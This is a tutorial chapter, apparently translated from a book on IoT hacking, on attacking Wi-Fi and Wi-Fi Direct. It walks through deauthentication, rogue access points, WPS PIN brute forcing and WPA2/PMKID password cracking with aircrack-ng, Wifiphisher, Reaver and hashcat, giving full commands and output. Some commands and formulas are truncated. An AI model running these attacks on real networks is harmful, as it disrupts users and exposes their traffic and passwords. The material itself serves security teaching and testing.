Part 12. Hacking radio channels. (Radio channels of the medium range of Wi-Fi hacking)

16 October 2023 35 minutes Author: Lady Liberty

Wireless IoT: Overview of Wi-Fi and possible attacks

Medium-range equipment allows you to wirelessly connect various devices to each other at a distance of up to 100 meters. In this section of our discussion, we will focus on Wi-Fi technology, which is one of the most popular among Internet of Things (IoT) devices. We’ll cover the basics of how the Wi-Fi wireless standard works and then dive into the details to describe some of the main types of attacks that can occur in this context. First, let’s find out exactly how Wi-Fi technology works. Wi-Fi, or wireless Internet, is a standard for wirelessly connecting devices to the Internet and one of the key achievements in the field of communication technology. It allows devices to exchange data via radio waves instead of traditional wired connections.

Wi-Fi works on the basis of radio waves and uses different radio frequencies to transmit and receive data between devices. Each device connected to Wi-Fi has its own unique identifier, known as a MAC address, which is used to identify itself on the network. Devices that are connected to the same Wi-Fi network can exchange data over a wireless channel. In this section, we covered some of the basics of Wi-Fi wireless communication and highlighted some of the main types of attacks that can be performed in this context. Knowing about these attacks and their possible consequences can help solve Wi-Fi security issues and protect IoT devices from potential threats.

How Wi-Fi works

Other medium-range radio technologies, such as Thread, Zigbee, and Z-Wave, were designed for low-speed applications with a maximum speed of 250 kbps, but Wi-Fi connectivity requires high-speed data transfer. In addition, Wi-Fi consumes more energy than other technologies.

Connecting to a Wi-Fi network uses an access point (AP), a network device that allows Wi-Fi devices to connect to the network, and a client device that can connect to the access point. When a client successfully connects to an access point and data flows freely between them, we say that the client is connected to the access point. We often use the term station (STA) to refer to any device that is capable of using the Wi-Fi protocol.

The Wi-Fi network can work in both open and protected mode. In open mode, the access point requires no authentication and accepts any client that tries to connect. In secure mode, the client must go through an authentication process before connecting to the access point. Some networks may also be hidden; in this case, the network will not broadcast its ESSID. ESSID is the name of the network, such as guest Wi-Fi or free Wi-Fi. BSSID is the MAC address of the network.

Wi-Fi connections exchange data using the 802.11 protocol suite, which implements Wi-Fi communication. 802.11 lists more than 15 different protocols, and they are designated by letters. You may already be familiar with the 802.11 a/b/g/n/ac standard, as you may have used some or even all of them over the past 20 years. The protocols support different types of modulation and operate at different frequencies and physical layers.

In the 802.11 standard, data is transmitted using three main types of frames: data itself, control, and control. In this section, we will only look at control frames. A management frame, as its name suggests, manages the network, for example, it is used in network discovery, client authentication, and even to associate clients with access points.

Wi-Fi Security Assessment Equipment

Typically, Wi-Fi security assessments include attacks on access points and wireless stations. When it comes to testing IoT networks, both types of attacks are critical, as more and more devices can either connect to a Wi-Fi network or act as access points.

If you’re targeting IoT devices in your wireless evaluation, you’ll need a wireless card that supports access point monitoring mode and is capable of adding the right packets to the traffic. Monitor mode allows your device to monitor all the traffic it receives from the wireless network. Packet injection capabilities allow your card to spoof packets to appear as if they came from another source. For the purposes of this chapter, we used the Alfa Atheros AWUS036NHA network card.

Also, you may need a dedicated access point to test different Wi-Fi settings. We used a TP-Link portable access point, but any will do. Unless the attacks are part of red team activity, the transmit power of the access point or the type of antenna you use doesn’t really matter.

Wi-Fi attacks on wireless clients

Attacks on wireless clients typically exploit the fact that 802.11 control frames are not cryptographically protected, making the packets vulnerable to interception, modification, or replay. You can perform all of these attacks with a variety of man-in-the-middle associative attacks. Attackers can also launch deauthentication and denial-of-service attacks that disrupt the victim’s Wi-Fi connection to the access point.

Deauthentication and Denial of Service Attacks

Control frames in the 802.11 standard cannot prevent an attacker from spoofing a device’s MAC address. As a result, an attacker can forge Deauthenticate or Disassociate frames. These are control frames that are typically sent to terminate a client’s connection to an access point. For example, they are sent if the client connects to another access point  or simply disconnects from the source network. In the event of a hack, an attacker can use these frames to break existing connections with specific customers.

Also, instead of disconnecting the client from the access point, an attacker can flood the access point with authentication requests. These, in turn, cause a denial of service, preventing legitimate clients from connecting to the access point. Both attacks are well-known denial-of-service attacks that were partially addressed in the 802.11w standard, but have not yet become widespread in the IoT world. In this section, we will perform a deauthentication attack that disconnects all wireless clients from the access point.

Start by installing the Aircrack-ng package if you are not using Kali where it is pre-installed. Aircrack-ng contains Wi-Fi evaluation tools. Make sure that the network card included in the packages is connected to the computer. Then, using the iwconfig utility, determine the interface name that belongs to the wireless card connected to your system:

# apt-get install aircrack-ng
# iwconfig
docker0 no wireless extensions.
lo no wireless extensions.
 wlan0 IEEE 802.11 ESSID:off/any
 Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
 Retry short long limit:2 RTS thr:off Fragment thr:off
 Encryption key:off
 Power Management:off
eth0 no wireless extensions.

In the output message of the utility, it is indicated that the wireless interface is wlan0.

Since some processes on the system can interfere with the Aircrack-ng tools, use the Airmon-ng tool to detect and stop these processes automatically. To do this, first disable the wireless interface using ifconfig:

# ifconfig wlan0 down
# airmon-ng check kill
Killing these processes:
PID Name
731 dhclient
1357 wpa_supplicant

Now put the wireless card into monitoring mode with Airmon-ng:

# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
 (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
 (mac80211 station mode vif disabled for [phy0]wlan0)

This tool creates a new interface called wlan0mon that you can use to run a basic sniffing session with Airodump-ng. The following command determines the BSSID (its MAC address) of the access point and the channel on which it operates:

# airodump-ng wlan0mon
CH 11 ][ Elapsed: 36 s ][ 2019-09-19 10:47
6F:20:92:11:06:10 -77 15 0 0 6 130 WPA2 CCMP PSK ZktT 2.4Ghz
6B:20:9F:10:15:6E -85 14 0 0 11 130 WPA2 CCMP PSK 73ad 2.4Ghz
7C:31:53:D0:A7:CF -86 13 0 0 11 130 WPA2 CCMP PSK A7CF 2.4Ghz
82:16:F9:6E:FB:56 -40 11 39 0 6 65 WPA2 CCMP PSK Secure Home
E5:51:61:A1:2F:78 -90 7 0 0 1 130 WPA2 CCMP PSK EE-cwwnsa

In this example, the BSSID is 82:16:F9:6E:FB:56, the channel is 6. We pass this data to Airodump-ng to identify the clients connected to the access point:

# airodump-ng wlan0mon --bssid 82:16:F9:6E:FB:56
CH 6 |[ Elapsed: 42 s ] [ 2019-09-19 10:49
82:16:F9:6E:FB:56 -37 24 267 2 6 65 WPA2 CCMP PSK Secure Home
BSSID STATION PWR Rate Lost Frames Probe
82:16:F9:6E:FB:56 50:82:D5:DE:6F:45 -28 0e- 0e 904 274

Based on this result, we identify the only client connected to the access point. The client has BSSID 50:82:D5:DE:6F:45 (MAC address of the wireless network interface). Now you can send a lot of disconnect packets to the client so that it loses its internet connection. We use Aireplay-ng to carry out the attack:

# aireplay-ng --deauth 0 -c 50:82:D5:DE:6F:45 -a 82:16:F9:6E:FB:56 wlan0mon

The –deauth option specifies the deauth attack and the number of deauth packets to send. A choice of 0 means that packets will be sent continuously. The -a option specifies the BSSID of the access point and the -c option specifies the target devices. The following listing shows the output of the above command:

11:03:55 Waiting for beacon frame (BSSID: 82:16:F9:6E:FB:56) on channel 6
11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|64 ACKS]
11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [66|118 ACKS]
11:03:57 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [62|121 ACKS]
11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [64|124 ACKS]
11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [62|110 ACKS]
11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [64|75 ACKS]
11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [63|64 ACKS]
11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [21|61 ACKS]
11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|67 ACKS]
11:03:01 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|64 ACKS]
11:03:02 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|61 ACKS]
11:03:02 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|66 ACKS]
11:03:03 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|65 ACKS]

This shows the shutdown packets sent to the target object. The attack is successful when the target device becomes unreachable. When you check this device, you will see that it is no longer connected to any network.

You can also perform denial-of-service attacks against Wi-Fi in other ways. Radio interference, another common method, creates obstacles to wireless communication regardless of the wireless protocol. In this attack, an attacker uses a software-defined radio device or cheap off-the-shelf Wi-Fi dongles to transmit radio signals and make the wireless channel unusable by other devices. We will show such an attack in Chapter 15.

Alternatively, you can perform selective eavesdropping, a sophisticated version of an eavesdropping attack in which an attacker intercepts only certain packets that are important to maintaining a valid connection.

It is worth noting that for some chipsets, deauthentication attacks can also degrade the encryption keys used for communication between the access point and the client. A recent study by antivirus company ESET discovered this vulnerability, which has been named Kr00k (CVE-2019-15126). Attacked Wi-Fi chips use a null encryption key on reconnection, allowing attackers to decrypt packets transmitted by the affected device.

Attacks on Wi-Fi connections

A connection attack tricks a wireless station into connecting to an attacker-controlled access point. If the target station is already connected to some other network, the attacker usually starts by implementing one of the deauthentication methods we just described. After the target device has lost connection to a legitimate access point, an attacker can lure it into a fraudulent network by abusing various functions of its network Head.

In this section, we will briefly describe the most popular connection attacks and then demonstrate an attack called Known Beacons.

Attack of the evil twins

The most common association attack is the “Evil Twin”, where a client is tricked into connecting to a fake access point into believing it is connecting to a known and legitimate access point.

We can create a fake access point using a network adapter with monitoring and packet injection capabilities. With this NIC, we configured the access point and configured its channel, ESSID and BSSID, making sure to copy the ESSID and encryption type of the legitimate access point. Now we will send a stronger signal to the target device than the signal of the real access point. You can improve your signal using different methods, such as moving closer to the target than the current access point or using a more efficient antenna.

KARMA attack

KARMA attacks connect users to unsecured networks by exploiting a vulnerability in clients configured to automatically detect known wireless networks. In this configuration, the client issues a direct test request, asking for specific access points, and then connects to the found point without authentication. A probe request is a control frame that initiates the binding process. Given this configuration, an attacker can simply acknowledge any of the client’s requests and connect it to his rogue access point.

For a KARMA attack to work, the devices you attack must meet three requirements. The target network must be Open, the client must have AutoConnect enabled, and the client must broadcast its preferred network list. The preferred network list is a list of networks that the client has previously connected to and trusts. A client with AutoConnect enabled will automatically connect to an access point if the access point sends it an ESSID that is already in the client’s preferred network list.

Most modern operating systems are not vulnerable to KARMA attacks because they do not send preferred network lists, but sometimes you may encounter a vulnerable system in older IoT devices or printers. If a device has ever connected to an open network that hides its ESSID, it is definitely vulnerable to a KARMA attack. The reason is that the only way to connect to open networks that hide their ESSID is to send them a direct request, in this case all the conditions necessary for KARMA attacks are created.

Attack of Known Beacons

After the KARMA attack was exposed, most operating systems stopped probing access points directly; instead, they only use passive snooping, where the device listens for a known ESSID from the network. This behavior completely eliminates all cases of KARMA attacks.

The Known Beacons attack bypasses this security feature by exploiting the fact that many operating systems enable the AutoConnect flag by default. Because access points often have very common names, an attacker can guess the ESSID of an open network in a device’s preferred network list. It then tricks that device into automatically connecting to an access point controlled by the attacker.

In a more sophisticated version of the attack, the attacker can use a dictionary of common ESSIDs, such as Guest, FREE Wi-Fi, etc., that the victim has likely connected to in the past. This is very similar to trying to gain unauthorized access to a work account by simply looping through the username when no password is required: a fairly simple but effective attack.

Figure 12.1 shows a Known Beacons attack.

An attacker’s access point begins by transmitting several beacon frames, a type of control frame that contains all the information about the network. This frame is broadcast regularly to notify devices of network availability. If the victim has information about this network in the list of preferred networks (because the victim has already connected to this network in the past) and if the access points of the attacker and the victim are of type Open, the victim will send a test request and connect to it.

Before we can perform this attack, we need to configure our devices. On some devices, you can change the auto-connect flag. The location of this option varies from device to device, but you can usually find it in the Wi-Fi settings, as shown in Figure 12.2, under an option called Automatic Reconnection. Make sure this option is enabled.

Then configure a public access point called  my_essid. We did this with a TP-Link portable hotspot, but you can use any device of your choice. After setup, connect the target device to my_essid network. Next, install Wifiphisher (, a rogue hotspot platform often used to assess network security:), a rogue access point platform often used to assess network security:

$ sudo apt-get install libnl-3-dev libnl-genl-3-dev libssl-dev
$ git clone
$ cd wifiphisher && sudo python3 install

Wifiphisher needs to target a specific network to start attacking clients of that network. We create a test network, also called my_essid, to avoid accidentally affecting external clients when we don’t have permission to do so:

#  wifiphisher -nD –essid my_essid -kB
[*] Starting Wifiphisher 1.4GIT ( ) at 2019-08-19 03:35
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan0 interface for creating the rogue Access Point
[+] Changing wlan0 MAC addr (BSSID) to 00:00:00:yy:yy:yy
[+] Changing wlan0 MAC addr (BSSID) to 00:00:00:xx:xx:xx
[+] Sending SIGKILL to wpa_supplicant
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting OAuth Login Page template

Run Wifiphisher as Known Beacons, adding the -kB argument. You don’t need to provide a list of attack words because Wifiphisher has it built in. The word list contains common ESSIDs that the victim may have connected to in the past. After running the command, the WifiPhisher interface should open, as shown in Fig. 12.3. The Wifiphisher panel displays the number of connected target devices. Currently, our test device is the only connected target device. Check out the list of best networks for the device you want to “trick” in this example.

For example, in fig. 12.4 presents a list of the best networks on the Samsung Galaxy S8+ device. Note that it has two networks saved; the first of them, FreeAirportWiFi, has an easy-to-guess name.


Of course, after we launch the attack, the device must disconnect from its current network and connect to the malicious, spoofed network (Figure 12.5).

From this moment, the attacker can act as a “man in the middle”, monitoring the traffic of the victim or even obstructing it.

Wi-Fi Direct

Wi-Fi Direct is a Wi-Fi standard that allows devices to connect to each other without a wireless access point. In a traditional architecture, all devices connect to a single access point to communicate with each other. In Wi-Fi Direct, on the other hand, one of the two devices acts as an access point. We call such a device a group owner. For Wi-Fi Direct to work, only the owner of the group must match the Wi-Fi Direct standard.

Wi-Fi Direct can be found on devices such as printers, TVs, game consoles, audio systems, and streaming devices. Many IoT devices that support Wi-Fi Direct are simultaneously connected to a standard Wi-Fi network. For example, a home printer can take photos directly from a smartphone via Wi-Fi Direct, but it’s probably also connected to a local network.

In this section, we’ll look at how Wi-Fi Direct works, what its main modes of operation are, and what methods you can use to use the security features.

How Wi-Fi Direct works

Figure 12.6 shows how devices establish Wi-Fi Direct powered connections.

During the device discovery phase, the device broadcasts a message to all nearby devices asking for their MAC addresses. There is currently no group owner, so any device can initiate this step. Then, in the service discovery phase, the device obtains the MAC addresses and proceeds to send unicast queries to each device asking for more information about their services. This allows it to decide whether to connect to each device. After the service discovery phase, the two devices decide who will be the owner of the group and who will be the client.

As a final step, Wi-Fi Direct relies on Wi-Fi Protected Setup (WPS) to securely connect devices. WPS is a protocol originally created to allow non-technical users to easily add new devices to a network. WPS offers several setup methods: push-button configuration (PBC), PIN entry, and NFC (Near Field Communication). In PBC, the group owner has a physical button, when pressed, the broadcast starts for 120 seconds. At this time, clients can connect to the group owner using their own software or hardware button.

This allows a confused user to press a button on a target device, such as a TV, and grant access to a third-party and potentially malicious device, such as an attacker’s smartphone. In the PIN code mode, the group owner has a special PIN code, which, when entered by the client, automatically connects two devices. In NFC mode, it’s as simple as bringing two devices together to connect them over the network.

Pin code guessing with Reaver power

Criminals can guess the PIN code by the method of sorting. This attack is similar to a one-click phishing attack, and you can use it with any device that supports Wi-Fi Direct with PIN entry.

This attack uses a weak octet attack on WPS pins; due to this problem, the protocol discloses information about the first four digits of the PIN code, and the last digit acts as a checksum, which facilitates the traversal of the WPS access point. Please note that some devices have overrun protection, usually blocking MAC addresses that have repeatedly tried to enter the wrong PIN. In this case, the complexity of the attack increases, since MAC addresses will have to be changed in the process of sorting PIN codes.

Nowadays, you rarely find access points with WPS pin mode enabled, as there are standard hacking tools. One such tool, Reaver, comes pre-installed on Kali Linux. In this example, we will use Reaver to browse a WPS contact. Although this access point provides brute force protection through rate limiting,  We will be able to recover the PIN if we have enough time. (Rate limiting limits the number of requests an access point will accept from a client during a predetermined time period.)

#  reaver -i wlan0mon -b 0c:80:63:c5:1a:8a -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@>
[+] Waiting for beacon from 0C:80:63:C5:1A:8A
[+] Switching wlan0mon to channel 11
[+] Received beacon from 0C:80:63:C5:1A:8A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...…
[+] Received WSC NACK
344  Глава 12
[+] Sending WSC NACK
[!] WARNING:  Detected AP rate limiting, waiting 60 seconds before re-checking
[+]  WPS PIN: '23456780'

As you can see, Reaver has targeted our test network and is starting to scan for pin codes. We then hit a speed limit that severely delays our efforts as the Reaver automatically pauses before trying again. Finally, we recover the WPS PIN code.

EvilDirect interception attacks

The EvilDirect attack is similar in many ways to the “evil doppelgänger” attack described above, except that it targets devices that use Wi-Fi Direct. This associative attack occurs in the process of connecting PBC. During this process, the client issues a connection request to the group owner and then waits for it to be accepted. An attacker group owner with the same MAC address and ESSID operating on the same channel can intercept the request and trick the victim client into connecting to it.

Before attempting to attack, you will have to impersonate the rightful owner of the group. Use Wififisher to identify the target Wi-Fi Direct network. Extract the link, ESSID, and MAC address of the group owner, then create a new group owner using the extracted data to configure it. Connect the victim to your fake network by creating a stronger signal than the original group owner as shown above.

Then stop any processes that are interfering with Airmon-ng, as we did earlier in this section:

# airmon-ng check kill

Put the wireless interface in monitor mode using iwconfig:

# iwconfig
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
# airmon-ng start wlan0

The iwconfig command allows you to determine the name of your wireless adapter. Our adapter is called wlan0. Once you have this name, use the airmon-ng start wlan0 command to safely put it into monitoring mode.

Then run Airbase-ng, a multipurpose Aircrack-ng tool designed to attack Wi-Fi clients. Specify the channel (-c), ESSID (-e), BSSID (-a) and monitoring interface, which in our case is mon0, as command line arguments. We got this information in the previous step.

# airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0
04:47:17 Created tap interface at0
04:47:17 Trying to set MTU on at0 to 1500
04:47:17 Access Point with BSSID BB:BB:BB:BB:BB:BB started.
04:47:37  Client AA:AA:AA:AA:AA:AA associated (WPA2;CCMP) to ESSID: "DIRECT-5x-BRAVIA"

The output states that the attack was initiated; our target client is now associated with a malicious access point.

Figure 12.7 shows that our attack was successful. We managed to connect the victim’s phone to a fake BRAVIA TV, impersonating the Wi-Fi Direct network of the source DIRECT-5x-BRAVIA TV.

In the real-world example, we also need to configure the DHCP server to forward all packets to the destination. Thus, we will not interrupt the connection of the target device with the legitimate server, and its owner will not suspect anything.

Attacks on Wi-Fi access points

This is not uncommon in the world of the Internet of Things, where IoT devices act as access points. This often happens when the device creates an open access point for the setup process (such as Amazon Alexa and Google Chromecast). Modern mobile devices can also act as hotspots to share their Wi-Fi connection with other users, and smart cars have built-in Wi-Fi hotspots that support 4G LTE connectivity.

Hacking an access point usually means breaking its encryption protocol. In this section, we’ll look at attacks on WPA and WPA2, two protocols used to secure wireless computer networks. WPA is an updated version of WEP, a very insecure protocol that can still be found on some older IoT devices. WEP generates a rather short initialization vector of only 24 bits, which is created using RC4 – an outdated and dangerous cryptographic function. WPA2, on the other hand, is an updated version of WPA that implements an encryption mode based on the Advanced Encryption Standard (AES).

Let’s discuss WPA/WPA2 Personal and Enterprise networks and identify key attacks against them.

WPA/WPA2 hack

There are two ways to hack a WPA/WPA2 network. The first targets networks that use shared keys. The second targets the Pairwise Master Key Identifier (PMKID) field on networks that allow 802.11r roaming. In roaming, the client can connect to different access points belonging to the same network without having to re-authenticate for each of them. Although the PMKID attack is more successful, it does not affect all WPA/WPA2 networks because the PMKID field is optional. A pre-shared key attack is a brute force attack that has a lower probability of success.

Shared key attacks

WEP, WPA, and WPA2 rely on secret keys that both devices must exchange, ideally over a secure channel, before they can exchange data. In all three protocols, access points have the same shared key for all their clients. To steal this key, we need to intercept the full four-way handshake. The WPA/WPA2 four-way handshake is a communication sequence that allows an access point and a wireless client to prove to each other that they both know a shared key without revealing it over the radio. By intercepting the four-way handshake, an attacker can perform an offline brute-force attack and reveal the key.

The authentication, called Extensible Authentication Protocol (EAP) over LAN (EAPOL), is a four-way handshake that uses WPA2 (Figure 12.8) to generate multiple keys based on a shared key.

First, the client uses a shared key, called Pairwise-Master Key (PMK), to generate a second key, called Pairwise  Transient Key (PTK), using the MAC addresses of both devices and a random one-time number from both sides. This requires the access point to send its random number, called an A-nonce, to the client. (The client already knows its own MAC address, and it gets the access point address when the two devices start exchanging data, so the devices don’t need to send it again.)

After the client has generated the PTK, it sends two items to the access point: a one-time S-nonce and a hash of the PTK, called the Message Integrity Code (MIC). Then the access point independently generates a PTK and checks the received MIC. If the MIC is valid, the access point issues a third key, the so-called Group Temporal Key (GTK), which is used to decrypt and broadcast traffic to all clients. The AP sends the GTK MIC and the full GTK value. The client checks them and responds with an acknowledgment (ACK).

Devices send all these messages as EAPOL frames (a type of frame used by the 802.1X protocol).

Let’s try to break the WPA2 network. To get the PMK, we need to extract the A-nonce, S-nonce, both MAC addresses and the MIC PTK. Once we get these values, we can perform a brute force attack offline.

In this example, we set up an access point that works in WPA2 shared key mode, and then connected a smartphone to it. You can replace the client with a laptop, smartphone, IP camera or other device. We will use Aircrack-ng to demonstrate the attack.

First, put the wireless interface into monitoring mode and remove the BSSID of the access point (see Deauthentication and Denial of Service Attacks for how to do this). In our case, we learned that the access point is operating on channel 1 and its BSSID is 0C:0C:0C:0C:0C:0C.

We will passively monitor the traffic, which will take some time because it will have to wait for the client to connect to the access point. You can speed up this process by sending deauthentication packets to an already connected client. By default, a deauthenticated client will attempt to reconnect to its access point by re-initiating the four-way handshake.

Once the client is connected, use Airodump-ng to start capturing frames sent to the target network:

# airmon-ng check kill
# airodump-ng -c 6 --bssid 0C:0C:0C:0C:0C:0C wlan0mo -w dump

After we’ve captured the footage for a few minutes, we’ll launch a brute force attack to crack the key. This can be done quickly with the power of Aircrack-ng:

# aircrack-ng -a2 -b 0C:0C:0C:0C:0C:0C -w list dump-01.cap
 Aircrack-ng 1.5.2
 [00:00:00] 4/1 keys tested (376.12 k/s)
 Time left: 0 seconds 400.00%
 KEY FOUND! [ 24266642 ]
 Master Key : 7E 6D 03 12 31 1D 7D 7B 8C F1 0A 9E E5 B2 AB 0A
 46 5C 56 C8 AF 75 3E 06 D8 A2 68 9C 2A 2C 8E 3F
 Transient Key : 2E 51 30 CD D7 59 E5 35 09 00 CA 65 71 1C D0 4F
 21 06 C5 8E 1A 83 73 E0 06 8A 02 9C AA 71 33 AE
 73 93 EF D7 EF 4F 07 00 C0 23 83 49 76 00 14 08
 BF 66 77 55 D1 0B 15 52 EC 78 4F A1 05 49 CF AA
 EAPOL HMAC : F8 FD 17 C5 3B 4E AB C9 D5 F3 8E 4C 4B E2 4D 1A

We are restoring PSC: 24266642. Please note that some networks use more complex passwords, which makes it difficult to implement this method.

PMKID attacks

In 2018, a Hashcat developer nicknamed atom discovered a new way to crack WPA/WPA2 PSK and talked about it on the Hashcat forums. The novelty of this attack is that it does not require client traffic; an attacker can compromise the access point directly without intercepting the four-way handshake. In addition, it is a more reliable method.

This new method takes advantage of the Trusted Security Network (RSN) features of the PMKID, an optional field typically found in the first EAPOL frame from the access point. PMKID is calculated as follows:


PMKID uses the HMAC-SHA1 function with PMK as the key. It encrypts the concatenation of the fixed string label “PMK Name”, the MAC address of the access point and the MAC address of the wireless station. For this attack you will need Hcxdumptool, Hcxtools and Hashcat. To install Hcxdumptool, use the following commands:

$ git clone
$ cd hcxdumptool && make && sudo make install

Before installing Hcxtools, you need to install libcurl-dev (if you haven’t already):

$ sudo apt-get install libcurl4-gnutls-dev

You can then install Hcxtools using the following commands:

$ git clone
$ cd hcxtools && make && sudo make install

If you are running in a Kali Linux environment, Hashcat should already be installed. In Debian-based distributions, the following command will help:

$ sudo apt install hashcat

First, we put our wireless interface into monitor mode. To do this, follow the instructions in Authentication and Denial of Service Attacks. Then use hcxdumptool to start reading the traffic and save it to a file:

# hcxdumptool -i wlan0mon -enable_status=31 -o sep.pcapng -filterlist_ap=whitelist.txt
warning: wlan0mon is probably a monitor interface
start capturing (stop with ctrl+c)
INTERFACE................: wlan0mon
ERRORMAX.................: 100 errors
FILTERLIST...............: 0 entries
MAC CLIENT...............: a4a6a9a712d9
MAC ACCESS POINT.........: 000e2216e86d (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65165
ANONCE...................: 6dabefcf17997a5c2f573a0d880004af6a246d1f566ebd04c3f1229db1ada39e
[18:31:10 – 001] 84a06ec17ccc -> ffffffffff Guest [BEACON, SEQUENCE 2800, AP CHANNEL 11]
[18:31:10 – 001] 84a06ec17ddd -> e80401cf4fff [FOUND PMKID CLIENT-LESS]
[18:31:10 – 001] 84a06ec17eee -> e80401cf4aaa [AUTHENTICATION, OPEN SYSTEM, STATUS 0, SEQUENCE
INFO: cha=1, rx=360700, rx(dropped)=106423, tx=9561, powned=21, err=0
INFO: cha=11, rx=361509, rx(dropped)=106618, tx=9580, powned=21, err=0

Make sure you use the -filterlist_ap argument with the MAC address of your object when using Hcxdumptool so you don’t accidentally crack the password for a network you don’t have permission for. The –filtermode option blacklists (1) or whitelists (2) the values in your list and then either avoids or targets them. In our example, we specified these MAC addresses in the whitelist .txt file.

As a result, a potentially vulnerable network identified by the tag [FOUND PMKID] was discovered. Once you see this tag, you can stop collecting traffic. Just be aware that you may have to wait for that moment. Also, since the PMKID field is optional, not all existing access points will have it.

Now we need to convert the received data, which includes PMKID data in pcapng format, into a format that Hashcat can recognize. Hashcat accepts hashes as input. We can generate a hash from the data using the power of hcxpcaptool:

$ hcxpcaptool -z out sep.pcapng
reading from sep.pcapng-2
file name....................: sep.pcapng-2
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 5.2.0-kali2-amd64
file application information.: hcxdumptool 5.1.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
Радиоканалы средней дальности: взлом Wi-Fi  351
read errors..................: flawless
packets inside...............: 171
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 22
probe requests...............: 9
probe responses..............: 6
association requests.........: 1
association responses........: 10
reassociation requests.......: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 47
authentications (BROADCOM)...: 46
authentications (APPLE)......: 1
EAPOL packets (total)........: 72
EAPOL packets (WPA2).........: 72
EAPOL PMKIDs (total).........: 19
EAPOL PMKIDs (WPA2)..........: 19
best handshakes..............: 3 (ap-less: 0)
best PMKIDs..................: 8
8 PMKID(s) written in old hashcat format (<= 5.1.0) to out

This command creates a new callable file that contains data in the following format:


This * delimited format  contains the PMKID, access point MAC address, wireless station MAC address, and ESSID. Create a new entry for each PMKID network defined. Now use the Hashcat 16800 module to crack the password of the affected network. The only thing missing is a list of words containing potential passwords for the access point. We will use the classic list of words rockyou.txt:

$ cd /usr/share/wordlists/ && gunzip -d rockyou.txt.gz
$ hashcat -m16800 ./out /usr/share/wordlists/rockyou.txt
OpenCL Platform #1: NVIDIA Corporation
* Device #1: GeForce GTX 970M, 768/3072 MB allocatable, 10MCU
OpenCL Platform #2: Intel(R) Corporation
Rules: 1
.37edb542e507ba7b2a254d93b3c22fae*b4750e5a1387*6045bdede0e2*4b61746879: purple123 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 37edb542e507ba7b2a254d93b3c22fae*b4750e5a1387*6045b...746879
Time.Started.....: Sat Nov 16 13:05:31 2019 (2 secs)
Time.Estimated...: Sat Nov 16 13:05:33 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 105.3 kH/s (11.80ms) @ Accel:256 Loops:32 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 387112/14344385 (2.70%)
Rejected.........: 223272/387112 (57.68%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456789 -> sunflower15
Hardware.Mon.#1..: Temp: 55c Util: 98% Core:1037MHz Mem:2505MHz Bus:16
Started: Sat Nov 16 13:05:26 2019
Stopped: Sat Nov 16 13:05:33

Hashcat succeeds in extracting the password: purple123.

Hacking WPA/WPA2 Enterprise to harvest credentials

In this section, we will discuss attacks on WPA Enterprise. A detailed description of WPA Enterprise exploits is beyond the scope of this book, but we will briefly review how such an attack works.

WPA Enterprise is a more sophisticated mode than WPA Personal and is mainly used in business environments that require additional security. This mode includes an additional component, a remote authentication service (RADIUS) server, and uses the 802.1x standard. In this standard, the four-way handshake occurs after a separate authentication process, EAP. For this reason, attacks on WPA Enterprise focus on EAP cracking.

EAP supports many different authentication methods, the most common of which are Protected-EAP (PEAP) and EAP-Tunneled-TLS (EAPTTLS). A third security method, EAPTLS, is becoming increasingly popular due to its security. As of this writing, EAP-TLS remains a secure option because it requires security certificates on both sides of the wireless connection, providing a more secure connection to the access point. However, the administrative overhead of managing server and client certificates may discourage many network administrators from this solution. The other two protocols only authenticate the certificate to the server, not the client, allowing clients to use credentials that can be intercepted.

Network connections in WPA Enterprise mode involve three parties: the client, the access point, and the RADIUS authentication server. The attack described here will target the authentication server and access point in an attempt to obtain hashes of the victim’s credentials for an offline brute force attack. It should work against PEAP and EAP-TTLS protocols.

